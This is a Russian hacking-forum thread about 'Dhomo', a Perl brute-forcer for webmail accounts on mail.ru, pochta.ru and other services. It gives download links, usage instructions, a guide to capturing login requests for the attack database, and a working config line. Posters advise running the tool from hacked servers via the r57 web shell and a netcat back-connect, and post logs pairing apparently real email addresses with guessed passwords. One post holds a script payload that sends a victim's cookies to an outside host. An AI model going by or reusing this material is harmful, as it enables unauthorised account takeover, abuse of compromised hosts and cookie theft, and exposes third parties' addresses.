:P

Спасибо за скрипт. Для коллекции пригодится. Сегодня гляну.
На всякий случай сделал зеркало:
http://rapidshare.com/files/6238437/dhomo-0.1b.rar

Скрипт еще достаточно сырой
Да сыроват он! Надо модевизовать!

&log ($login,$domain,$pass);Perl 4 рулит?)

В целом клево, осталось многопоточность ;)

осталось многопоточность ;)
будет, немного позже.. (насчет perl4 - буду исправляться =))

2KPOT_f!nd, не совсем понял последнего слова в твоем посте =) (мож быть "модернизировать".. или не?? %) ).. Напиши, плз, в каких именно местах ты видишь мой скрипт "сыроватым"... а то так мне не очень понятно, что именно подсушить надо в нем.. =)

deliT :(

Потом начил изучать скрипт и там нашел эту багу! МНОГОПОТОЧНОСТЬ!
мда-с, ты прав! МНОГОПОТОЧНОСТЬ, это бага в моем брутере...
=)))

GooD!

помогите
The server encountered an internal error or misconfiguration and was unable to complete your request.
вот что мне пишет когда я хочу его запустить, может я что то не так делаю?

KPOT_f!nd, нда.. по-моему, иногда лучше молчать чем говорить...

Digimortal, молодец. Скрипт не тестил.. но раз написал - почему бы не похвалить).

Автору +, не поленился) Хотя я тоже скрипт не тестил
Короче многопоточность уже сказалИ! Это я хотел сказать!

Усовершенствовать его! то есть многопоточность! Сперва я его запустил на шелле долго брутил, думал что канал забит залил его на новый шелл токая же трабла! Потом начил изучать скрипт и там нашел эту багу! МНОГОПОТОЧНОСТЬ!
Улыбнуло

vizard-06
Нах ты пытаешся его запустить из браузера???

KРOT кароче ты загнался, вот и все)

проверь, может быть нужно изменить путь к интерпретатору перл.
я в перле не силён....как? на какой?
2. мб каким-то образом повредился код скрипта.3. может вылазить такая ошибка и из-за отсутствия нужного модуля.4. может в директории, куда устанавливаешь запрещено исполнять перл-скрипты??
с этим вроде всёнорм

Нах ты пытаешся его запустить из браузера???
а какещё?(не шарю в перле)

а какещё?
для win:
Пуск ---> Выполнить ---> cmd
В командной строке вбиваешь:
с:\usr\bin\perl путь_к_скрипту\скрипт.pl

vizard-06,
путь к интерпретатору можно узнать с помощью which:
which perl

но, возможно, лучше будет установить тебе ActivePerl и использовать его...

Слегка обновил скриптег (скачать можно по ссылке в 1ом топике).. Добавил поддрежку еще четырех почтовых систем (nextmail, km.ru, goon.ru, gala.net). Теперь брутить можно по 46ти доменам поддерживаемых 8 почтовых служб..

И еще, пожалуй, сделаю тут небольшую инструкцию (для нуждающихся в ней):
1. В файл emails.txt вносим список адресов ящиков, которые будем брутить. Это могут быть адреса на разных доменах - скрипт будет брутить только те, что поддерживаются, остальные - пропустит.
2. в файл passwords.txt, понятно дело помещаем пассы.
3. если в первых 2х пунктах вы засунули в оба файла дофига всего, то не надо удивляться, что скрипт будет оочень долго работать. =)
4. надеюсь больше не будет вопросов про ошибку при запуске этого скрипта из браузера и предложений по устранению многопоточности =))) Пишите, плз, если, какая то почтовая служба перестала брутиться или есть дельные предложения по усовершенствованию скриптика..

зы. а еще можете предлагать тут, поддержку каких еще почтовых сервисов желаете увидеть ;)

Смотри. я бы просто кинул сами реквесты в отдельный файлик а уже из него потом их считывал, вместо того чтобы засовывать все в скрипт )

Смотри. я бы просто кинул сами реквесты в отдельный файлик а уже из него потом их считывал, вместо того чтобы засовывать все в скрипт )
В общем то верная мысль, это удобнее будет.. Наверное сделаю именно так в одной из след. версий.. )

Малюсенькое обновление до 0.22b всвязи с изменениями на маил.ру..
Советую тем, кто уже пользуется этим скриптом скачать эту версию, т.к. кое-что подправлено, и теперь он работает получше..

а помоему надо добавить функцию грубого перебора ну чтобы пользователь сам выбрал по каким символам брутить мейл (a..z, 0..9 ит.д)

R3']а помоему надо добавить функцию грубого перебора ну чтобы пользователь сам выбрал по каким символам брутить мейл (a..z, 0..9 ит.д)
этого точно небудет..
просто я считаю полный перебор в данном случае не особо эффективым средством.. кто занимается брутом мыл, я думаю, со мною согласятся.. в конце концов, всегда можно создать нужный словарь из необходимых символов..

Итак, обновил скрипт до версии 0.35..

Изменения:
- во первых абсолютно целиком перепсал весь код, он стал гораздо более "перловый" ;)..
- база с запросами вынесена в отдельный файл, теперь ее достаточно просто обновлять..
- реализована возможность многопоточного брутфорса (колличество потоков можно указать как аргумент при запуске [по умолчанию - 10])..

нормально потестировать особо времени нету, поэтому, кому интересен данный скриптег - просьба потестить и отписаться тут об обнаружившихся багах и.т.п...

скачать можно по ссылке в 1-м топике..

А на какой бесплатный php хост можно залить этот скрипт для тестирования?

Makes, php тут ни причем.. нужен perl
Лучше залить на веб-шелл.

кста,
http://digimortal.0x48k.cc/toolz/dhomo-0.5b.rar - последняя версия.. немного улучшил работу с потоками, но все же есть недоработочка, проявляющаяся если выставить много потоков.. как будет время переделаю код, чтоб работало нормально.. базу тоже давно не обновлял.. rambler из нее можно выкинуть..

Увжаемые господа!
Комментируя тему, оставляйте равернутый(по теме) комментарий. Односложные замечания типа "отличный брут +)" можно оставить в репутации, не обязательно создавать пост. Спасибо

Классный БРУТ!!!Хотелось бы чтоб ешё и yandex.ru брутил, а так всё на 5+!!!

нужно уменьшить загрузку проца
при открывании большого словаря с паролями
на многих хостах стоит ограничение на загрузку проца
например словарь 8 символов числа 935mb открыть не удалось
вобщем нужна модернизация под брут именно на хостах,дедиках и.т.п
может даже веб интерфейс добавить ;)

нужно уменьшить загрузку проца
при открывании большого словаря с паролями
на многих хостах стоит ограничение на загрузку проца
например словарь 8 символов числа 935mb открыть не удалось
вобщем нужна модернизация под брут именно на хостах,дедиках и.т.п
может даже веб интерфейс добавить ;)
спасиб, постараюсь это учесть (я то тестирую самое большее со словарем в 50mb, потому таких проблем не наблюдал )).. насчет веб-интерфеса подумаю когда работа скрипта будет достаточно отлажена..

вот только что пробовал устанавливать твой брут
на хостинге Зенон и не желает работать :(
если хочеш могу дать адрес веб шелла может
у тебя получится его запустить

>> если хочеш могу дать адрес веб шелла может у тебя получится его запустить

не хочу, лучше напиши какие ошибки..

я б сказал какие ошибки но веб шелл r57 ничего не показывает
файл dhomologs.txt пуст права на запись есть
чтоб видеть ошибки нужен
консольный доступ через putty и сооветственно пароль
может есть способ записать ответ в файл

ну сделай back-connect на nc из r57..

а лучше сначала просто посмотри

perl -version

может threads не поддержуются..

вот что дал back-connect
perl /bhome/part3/01/estetica/vcgi/dhomo.pl
Can't locate threads.pm in @INC (@INC contains: /bhome/part3/01/estetica/perllib
/usr/local/perl/lib/5.6.1/i386-freebsd /usr/local/perl/lib/5.6.1 /usr/local/per
l/lib/site_perl/5.6.1/i386-freebsd /usr/local/perl/lib/site_perl/5.6.1 /usr/loca
l/perl/lib/site_perl/5.6.0/i386-freebsd /usr/local/perl/lib/site_perl/5.6.0 /usr
/local/perl/lib/site_perl/5.005/i386-freebsd /usr/local/perl/lib/site_perl/5.005
/usr/local/perl/lib/site_perl .) at /bhome/part3/01/estetica/vcgi/dhomo.pl line
4.
BEGIN failed--compilation aborted at /bhome/part3/01/estetica/vcgi/dhomo.pl line
4.

модуль threads.pm присутствует в версиях perl >5.8, если я не ошибаюсь, так что похоже тебе придется поискать другой сервер для брута..
для этого хоста могу предложить разве что использовать старую версию своего брута - без многопоточности.. если хочешь - выложу тут..

ой улыбнул меня твой пост чесно говоря --- зачем изобретать велосипед хз----- только если ради практики и набивания так сказать руки --- твой брут эээ бери мой для мела 3.0 меняй текст отсылаемого пакета и ответ сервака для распознования и вперед --- эти все почтовики уйдут в баню и код уже отлажен и настроен и многопоточность =)--- а так молодец

расскажи как составлять базу для брута
вот еще одна форма<FORM action=http://www.guestbook.ru/system/ method=post><!-- LOGIN -->
<TABLE cellSpacing=2 cellPadding=0 border=0>
<TBODY>
<TR>
<TD class=form>Логин:&nbsp;&nbsp;</TD>
<TD class=form><INPUT name=login></TD>
<TD>&nbsp;</TD></TR>
<TR>
<TD>Пароль:&nbsp;&nbsp;</TD>
<TD class=form><INPUT type=password
name=password></TD>
<TD class=button>&nbsp;<INPUT type=submit value=Войти></TD></TR></TBODY></TABLE><!-- // LOGIN --></FORM></P>
<P></P>

>> ой улыбнул меня твой пост чесно говоря ---

и чем же он тебя так улыбнул ? ))

>> зачем изобретать велосипед хз----- только если ради практики и набивания так сказать руки --- твой брут эээ бери мой для мела 3.0 меняй текст отсылаемого пакета и ответ сервака для распознования и вперед ---

да, ради практики.. кроме того я хочу не переписывать каждый раз скрипт для каждого отдельного почтовика.. зачем создавать кучу маленьких трехколесных великов, когда можно сделать всего один, нормальный ? =)

>> код уже отлажен и настроен и многопоточность =)--- а так молодец

я в твой скриптег заглядывал уже как-то - и был просто в шоке, когда увидел, как там была реализована многопоточность... щас посмотрел - уже получше, но вот сам код оставляет желать лучшего, так что брать и переписывать его я не стану, а лучше уделю время своему )..

расскажи как составлять базу для брута

Строка,содержащая инфу для брута в базе имеет вид:

['1', '2', '3', '4', 5, '6', '7', ... , 'n'];

Чтобы прописать значения 1-6 необходимо про-
смотреть http-заголовки при авторизации,
причем авторизации как удачной, так и нет.
Это можно сделать, например плагином к файр-
фоксу LiveHTTPHeaders.

Пример запроса на авторицацию на Mail.ru
(оставлены только заголовки, имеющие для нас
значение):

POST /cgi-bin/auth HTTP/1.1
Host: win.mail.ru
Keep-Alive: 300
Referer: http://win.mail.ru/cgi-bin/login
Content-Length: 84
page=&post=&login_from=&Login=lalala&Domain=mail.ru&Password=lalala&level=1

Отсюда берем:
1 - win.mail.ru
2 - page=&post=&login_from=&Login=zlogin&Domain=zdomain&Password=zpass&level=1
(тут нужно заменить значения параметров
логин, домен, пасс на zlogin, zdomain и
zpass соответственно)
3 - /cgi-bin/auth
4 - http://win.mail.ru/cgi-bin/login
5 - это количество байт, которое нужно получить,
чтоб увидеть значение 6 ;)
6 - отичительная черта, подстрока которая есть
только в ответе при удачной авторизации
(в данном случае это может быть, например,
"Set-Cookie:")
7 и последущие значения - это
домены данной почтовой системы..

Примечания:
-ответ при удачной и неудачной ав-
торизации может и не отличаться,
тогда следует увеличить значение
"5" и смотреть различия уже в ко-
де страницы.
-все домены некоторых сервисов не
получится прописать в одну строку,
а придется делать отдельную для
каждого домена (но такой мне по-
встречался 1 из 9 =).

вот ответ на другом сервере
тут perl 5.8.7 но опять проблемы с потоками вроде этого модуля нет
выложи старую версию брута без многопоточности
perl /usr/local/www/uploads/dhomo.pl
/usr/local/www/uploads/dhomo.pl line 4:

This Perl hasn't been configured and built properly for the threads
module to work. (The 'useithreads' configuration option hasn't been used.)

Having threads support requires all of Perl and all of the XS modules in
the Perl installation to be rebuilt, it is not just a question of adding
the threads module. (In other words, threaded and non-threaded Perls
are binary incompatible.)

If you want to the use the threads module, please contact the people
who built your Perl.

Cannot continue, aborting.
BEGIN failed--compilation aborted at /usr/local/lib/perl5/5.8.7/mach/threads.pm
line 28.
Compilation failed in require at /usr/local/www/uploads/dhomo.pl line 4.
BEGIN failed--compilation aborted at /usr/local/www/uploads/dhomo.pl line 4.

однопоточный заработал но теперь другая проблема
не находит правильный пароль на хосте

а на моем компе находит

Starting bruteforce at Tue Mar 13 21:24:15 2007
fudobat@photofile.ru;parol
Ending bruteforce at Tue Mar 13 21:24:29 2007
Passwords founded: 1. Time remaining: 14 sec

на хосте

Starting bruteforce at Tue Mar 13 22:16:58 2007
Ending bruteforce at Tue Mar 13 22:17:11 2007
Passwords founded: 0. Time remaining: 13 sec

наверное дедик придется покупать

этого точно небудет..
просто я считаю полный перебор в данном случае не особо эффективым средством.. кто занимается брутом мыл, я думаю, со мною согласятся.. в конце концов, всегда можно создать нужный словарь из необходимых символов..
а я думаю что добавить прямой перебор именно цифр до 8 символов
имеет смысл такой словарь весит около 1Gb и залить его
проблематично а вот сбрутить вполне реально тем более что
цифровые пароли встречаются довольно часто

с брутом от genom та же фигня у себя работает на хостах нет

>> такой словарь весит около 1Gb и залить его проблематично

зачем заливать, когда можно его сгенерировать? (если место есть свободное, конечно)
может позже сделаю такую функцию + брут по маске..

>> с брутом от genom та же фигня у себя работает на хостах нет

потому что проблема не в бруте, а в твоем хосте.. поищи другой..

Всем здорова! Вот проблема возникла: сначало сбрутился пароль для одного ящика, я заюзал его а почтовик пишет неверный пароль, ну думаю ладно, дальше у всех сбрученых ящиков такая же фигня. Но потом для ящиков стал выдавать по несколько паролей такие как: mailpassword, qwerty, passwd. Ну так подскажите в чем траблы? Может у меня руки кривые:)

ты бы хоть написал какой домен/домены ты брутил.. словарь большой был? ошибки появлялись?

5 сайтов тестил, на 2х брут работал

2 Digimortal вот записи из лога:

mtv2002@pisem.net;qwerty
mtv2002@pisem.net;mailpassword
vector@rbcmail.ru;passw
vector@rbcmail.ru;qwerty
vector@rbcmail.ru;admin
vector@rbcmail.ru;mailpassword
vector@rbcmail.ru;passwd

Файл с паролями содержит всего 12 записей, а вот с мэйлами весит 748 кб. Хотя щас поробую брутеру только несколько мэйлов скормить, может и получится нормально.
Кстати ошибок ни каких не было, тьфу-тьфу:~)

Вот оставил только два ящика, словарь с паролями такой же маленький:

mtv2002@pisem.net;passwd
mtv2002@pisem.net;admin
mtv2002@pisem.net;12345
mtv2002@pisem.net;mailpassword
mtv2002@pisem.net;passw
mtv2002@pisem.net;qwerty
vector@rbcmail.ru;passwd
vector@rbcmail.ru;admin
vector@rbcmail.ru;12345
vector@rbcmail.ru;mailpassword
vector@rbcmail.ru;passw
vector@rbcmail.ru;qwerty

Причем ни один из этих паролей не подходит.
Незнаю я уже че еще можно придумать:(.

Murt@zaa, тут проблема всего лишь в том, что на хотбоксе произошли некоторые изменения..
а потому следует слекга подправить вторую строку в базе скрипта, чтоб все нормально работало:

['www.pochta.ru', 'reason=login&lng=ru&rnd=123456789&user=zlogin&domain=zdomain&pass=zpass&rememb=0', '/login.php', 'http://www6.pochta.ru/index.php?lng=ru', 350, 'Set-Cookie: id=', 'pochta.ru', 'fromru.com', 'pochtamt.ru', 'hotbox.ru', 'krovatka.net', 'rbcmail.ru', 'front.ru', 'pop3.ru', 'land.ru', 'smtp.ru', 'mail15.com', 'mail333.com', 'pisem.net']

2 Digimortal большое спасибо все исправил, все работает как часы.

Юзаю 0.32b, т.к. 0.5 не пашет, как сказал автор темы наверно не поддерживается многопоточность. Пробовал ломать свое мыло, тут все гуд, но когда ставлю небольшой словирк метров на 7, то по проишествии какого то времени выдается следующее, в чем дело, как исправить. Ящик на mail.ru


[>] Dhomo v.0.32 - the Simple email webinterface bruteforcer
[>] by Digimortal [http://digimortal.0x48k.cc]
[>]
[i] Loading base..
[i] Starting bruteforce at Sat Jun 2 17:58:47 2007
Can't use an undefined value as a symbol reference at dhomo-0.32b.pl line 74, <$ passwd> line 3128.

Digimortal, твой хостер умер. Дайте кто-нибудь зеркало, пожлст.

http://slil.ru/24568172

залейте плз кто-нить еще разок... винт погорел, скрипт потерялся=(
-----------------------------------------------
добавлено: простите криворукого, нашел сам=)
http://slil.ru/24674272

Залейте, пожалуйста кто-нить свежую dhomo.base!

Заранее благодарен.

http://slil.ru/24568172 - Файл не найден
http://slil.ru/24674272 - Файл не найден

Плз перезалейте последнюю версию брута.

Плз перезалейте последнюю версию брута.

здесь (http://webfile.ru/2069364) 0.5b

при отправке на мэйл
<script>img = new Image(); img.src = "http://vnikopole.ru/s/s.gif?cook='+document.cookie;</script>


мэйл пишет в письме


ВНИМАНИЕ! Данное письмо содержит потенциально опасный HTML-код, заблокированный системой безопасности. Возможно, оно отображается неправильно.

dfanat
Так на фреймы или на забаненные HTML'ки реагирует

А вот интересно.. скрипт-то "многофукционален", а вот как насчет другий почтовиков, например yandex.ru или rambler.ru ??
Автар не планирует еще такую "универсальность" ?

Перезалейте плиз

Перезалейте плиз кто нить.

_http://depositfiles.com/files/sayov9wt4
_http://uploadbox.com/files/103be27250

pass:antichat.ru

д-хомо гей название... :)

проц грузит и рам ест...
но работает быстро только лог в ТХТ это лишнее сразу бы в резуль кидал бы удачку...

Не знаю, что и делать... Не работает... Вот лог:


Bruteforce launched (10 threads) at Fri Jun 5 20:38:08 2009
mrsimpson96@bk.ru;!

mrsimpson96@bk.ru;ansarina

mrsimpson96@bk.ru;cheukho

mrsimpson96@bk.ru;electrocemper

mrsimpson96@bk.ru;habiyon

Bruteforce completed at Fri Jun 5 20:38:30 2009
Found passwords: 5. Spent time: 22 sec


Ни один из этих паролей к аккаунту не подходит... Что я делаю не правильно?

Для чистоты эксперимента я поставил мыло с паролём, который ТОЧНО есть в словаре.... Результат абсолютно тот же, те же пять паролей... Но нет того, который верен... Что делать?